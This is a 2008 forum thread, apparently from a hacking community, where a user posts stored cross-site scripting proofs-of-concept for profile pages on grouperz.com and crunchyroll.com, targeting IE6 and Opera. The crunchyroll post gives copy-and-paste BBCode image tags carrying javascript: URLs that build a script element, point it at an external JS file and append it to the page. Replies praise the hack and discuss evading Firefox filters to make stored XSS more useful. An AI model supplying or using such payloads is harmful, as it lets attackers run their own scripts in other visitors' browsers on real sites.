[b]grouperz:[/b] [url=http://grouperz.com/shakiro214][b]proof-of-concept[/b][/url] - [b]IE 6[/b] & [b]Opera[/b]
post in turn-ons, turn-offs, hobbies, music, movies, etc.
<">just replace the [b]URL_OF_JS.txt[/b] and you can tweak the profiles for the browsers mentioned above
hopefully someone else will bypass the FF part
shakiro dash! ~~~
Last edited by shakiro214 (2008-04-29 04:25:48)
^
no doubt ... epic win..
due to the linker is kinda over all.
sugoi~!
well,good job~
Last edited by bratinela01 (2008-04-25 05:46:40)
Long time no see... again
You should do the myspace one, even if you're not gonna use it right away
I don't think anyone knows about it. And if they do, they're really smart for not blogging about it to the public
XD haha hope you can find a linker that are compatible to FF well anyway epic win for ya
SPAM -> "THX FOR SHARING"
But I'm not really that active in the site though.
Nice hacking shak. 
demo.. it's tough finding ways to inject for FF
It doesn't have many methods on the XSS cheatsheet, but I will get stronger somehow
I must
Popular sites have better filters now & browsers are being updated against XSS. At this rate...
there will need to be new methods and soon
[b]@xavierkym[/b]
We will surpass XSSed.com - too much reflective xss, which aren't very useful
stored xss is better
ehehe
I wonder how he knew it was vulnerable so quickly...[/quote]
[url=http://www.crunchyroll.com/user/shakiro214][b]proof-of-concept[/b][/url]
[b]crunchyroll.com[/b] - IE6 & Opera
[b]Edit Profile[/b]
[b]Step 2:[/b] copy & paste to about me
[quote][img]javascript:ta=document.createElement('script')[/img]
[img]javascript:ta.src='URL_TO_JS.txt'[/img]
[img]javascript:topbar_firstrow.appendChild(ta)[/img][/quote]
* just replace the [b]URL_TO_JS.txt[/b]
shakiro dash! ~~~
Last edited by shakiro214 (2008-04-29 04:42:15)
[/font]
Last edited by stepdarn14 (2008-04-27 05:11:08)